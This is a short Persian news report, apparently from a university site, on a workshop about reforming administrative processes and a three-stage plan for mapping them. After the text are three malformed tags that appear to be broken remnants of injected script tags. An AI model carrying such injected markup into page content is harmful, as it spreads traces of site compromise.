اولین کارگاه اصلاح فرآیندهای دانشگاه با حضور نمایندگان و کارشناسان بهبود کیفیت واحدها در سالن جلسات معاونت تحقیقات توسط مدیریت توسعه سازمان و تحول اداری دانشگاه برگزار گردید.

تقوی مدیر توسعه سازمان و تحول اداری دانشگاه با بیان اینکه اصلاح فرآیندها به عنوان یکی از شاخص های  ارزیابی عملکرد دستگاهها در جشنواره شهید رجایی می باشد و هرساله مورد ارزیابی قرار می گیرد افزود: در سال جاری نیز واحدهای تابعه با تشکیل کارگروه تخصصی اصلاح فرآیندها در مجموعه خود در طی سه مرحله اقدام به احصاء و اصلاح فرآیندهای خود می نمایند که در مرحله اول شناسایی  و رسم فرآیندهایی که بیشترین ارباب رجوع را داشته در اولویت کار می باشد  و در مراحل بعدی شناسایی و رسم فرآیندهای اختصاصی و عمومی و اصلاح و بازنگری فرآیندهای تعیین شده اجام خواهد پذیرفت.

در ادامه کارشتاس تحول اداری توضیحاتی در خصوص نحوه رسم فرآیندها ، کار با نرم افزار مربوطه و تکمیل شناسنامه فرآییندها ارائه نمودند.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *